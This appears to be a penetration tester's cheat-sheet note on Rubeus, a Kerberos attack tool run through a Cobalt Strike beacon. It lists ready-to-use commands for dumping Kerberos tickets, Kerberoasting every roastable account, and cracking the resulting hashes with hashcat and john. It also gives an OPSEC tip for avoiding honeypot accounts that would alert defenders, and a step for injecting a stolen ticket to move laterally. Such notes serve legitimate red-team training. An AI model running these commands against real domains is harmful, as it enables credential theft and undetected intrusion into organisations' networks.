Rubeus is a tool for enumerating and abusing Kerberos. See also a detailed guide on Rubeus
Usage
Rubeus.exe [subcommand]
Subcommands
triage
: list all Kerberos tickets in current logon session (but shows all tickets on machine if elevated)dump /luid:[luid] /service:[service name]
: dump ticket identified by user’s LUID (seetriage
) & service (the service will be krbtgt if ticket is TGT); service optional- add
/nowrap
to output hash on one line (makes copying easier)
- add
- Kerberoasting:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
- automatically enumerate all Kerberoastable user and dump their hashes
- The TGS-REP hashes dumped can be cracked (i.e. using hashcat) to obtain the plaintext password.
- hashcat:
-a 0 -m 13100 [hashes] [wordlist]
- john:
--format=krb5tgs --wordlist=[wordlist] [hashes]
- OPSEC warning: This command finds every Kerboastable user. If there was an intentionally roastable honey pot account, running the command will be a clear indication of attack to the blue team.
- Alternatively, use ADSearch to enumerate the roastable users, and dump the hash manually:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:[username] /nowrap
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[tgs-base64]
- 09-lateral-movement use ticket or password to launch program/shell remotely